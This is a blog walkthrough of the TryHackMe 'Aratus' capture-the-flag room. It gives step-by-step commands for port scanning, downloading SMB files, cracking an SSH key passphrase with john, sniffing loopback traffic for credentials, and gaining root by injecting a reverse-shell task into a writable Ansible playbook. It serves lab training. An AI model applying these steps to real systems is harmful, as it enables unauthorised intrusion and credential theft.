TryHackMe – Aratus

Aratus on TryHackMe is an interesting room, below is the path I found that worked for me and doesn’t cover everything I tried, its simply the path I took that worked!

Scoping out a library…

I started out with my masscan and nmap commands;

masscan -p1-65535 <THM_IP> --rate=1000 -e tun0 > ports
awk '{print $4}' ports | sed 's|[/tcp,]||g' > nmapports
nmap -sC -sV -p $(tr '\n' , <nmapports) -Pn -oN ./nmapinitial <THM_IP>

From my portscan, there were a few ways we could go;

TryHackMe Aratus-Port Scan
PortScan of TryHackMe Aratus room

So, to summarise, FTP had nothing….. The Site seemed like a rabbit hole BUT SMB….. That looked interesting…..

TryHackMe Aratus-SMB Share
SMB Share

Starting off with the message to Simeon, apparently, he’s left his password everywhere! Looks like i need to find a password!

How Much Reading do I need to do!

I decided to download everything from the SMB to look through it locally using;

recurse on
prompt off
mget *

With that downloaded, I start searching for “Password”, “PWD” etc and found…… nothing!

But when I searched for ID with

find . -type f -exec grep -H 'ID' {} \;

TryHackME Aratus RSA

So, lets copy that into a file called id_rsa, then chmod 600 rsa and then we can use

ssh -i id_rsa simeon@10.10.5.226

We have our initial foothold now?

Aratus - SSH Attempt 1

Absolutely not! That would be too easy!

Not a problem, to get the passphrase

ssh2john id_rsa > sshrsa #if this isn't already installed, links at the end
john sshrsa -w=<path_to_rockyou>

Now were in, lets see what we can do!

Not much I can do!

Looking at Simeon, it’s clear we need to escalate! So, I transferred over LSE (see the links at the end) by starting a python webserver on my local machine and used curl on the remote machine.

TryHackMe Aratus - Curl Privesc

So what did LSE find?

START      PID     USER COMMAND
14:18     8770 theodore /usr/bin/python3 /home/theodore/scripts/test-www-auth.py
START      PID     USER COMMAND
14:18     8771     root ping -c 30 127.0.0.1

[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

Theodore has a script running and pinging the localhost, we also have access to tcpdump, lets see what we can find with;

tcpdump -e lo -A
Aratus-TCPDump

Looks like we have a base64 encoded credential, using CyberChef we can decode this.

With that decoded use su with the username and password you decoded!

Privesc part 2 – Return of LSE

Grabbing the user flag first…

Aratus User Flag

I decided to run LSE again and used the password for the user I switched to, this gave us some things to try to escalate to root.

[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for theodore on aratus:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:
    (automation) NOPASSWD: /opt/scripts/infra_as_code.sh
---
[*] fst000 Writable files outside user's home.............................. yes!
---
/run/dbus/system_bus_socket
/run/systemd/private
/run/systemd/journal/socket
/run/systemd/journal/stdout
/run/systemd/notify
/var/tmp
/var/spool/mail/theodore
/var/spool/samba
/tmp
/tmp/.XIM-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.font-unix
/tmp/tmp.hEy9yFmRea
/tmp/tmp.JAdtOrZ9vB
/home/simeon/message-to-simeon.txt
/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
/opt/ansible/README.txt

Lets look at the script that automation can run with sudo,

#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml

Looking at the script we can see it will run all yaml files within the playbook, luckily, the one that is writable by our current user is within this. To read more on how these work, the documentation is found here https://docs.ansible.com/ansible/latest/user_guide/playbooks.html.

I decided to try the easy way of inserting a task to run a bash reverse shell in the yaml file, which sounded too easy on reflection!

Lets Get Root!

Using a bash reverse shell (I used an online generator, link at the end), create a reverse.sh file using vim and paste your bash reverse shell as below and save this in /tmp.

Aratus Bash Reverse Shell

Then save this by pressing the escape key and typing :wq.

Next we need to add a task into the configure-RedHat.yaml to chmod our by opening it using;

vim /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
Arartus - Configure yaml playbook

Save this as before and lets run it with;

sudo -u automation /opt/scripts/infra_as_code.sh

Now that’s amended our reverse.sh script, lets actually run this by amending the yaml file again to the below and start a listener on the port we specified in the bash script.

Aratus - Reverse Shell

Save this as before and run the script again.

sudo -u automation /opt/scripts/infra_as_code.sh
Aratus Root

We now have a root shell and we can get the root flag!

Conclusion

I really enjoyed this room! The lateral movement process was interesting to sniff the network traffic! I could have done the initial foothold a few different ways i.e SSH bruteforce, but in a real task this would have set off some alarm bells!

Thank you to Biniru for the challenge!!

If you have any suggestions for any rooms you want to see, get in touch here!

Marc

Links

Aratus Room – https://tryhackme.com/room/aratus

SSH2John – https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

LSE – https://github.com/diego-treitos/linux-smart-enumeration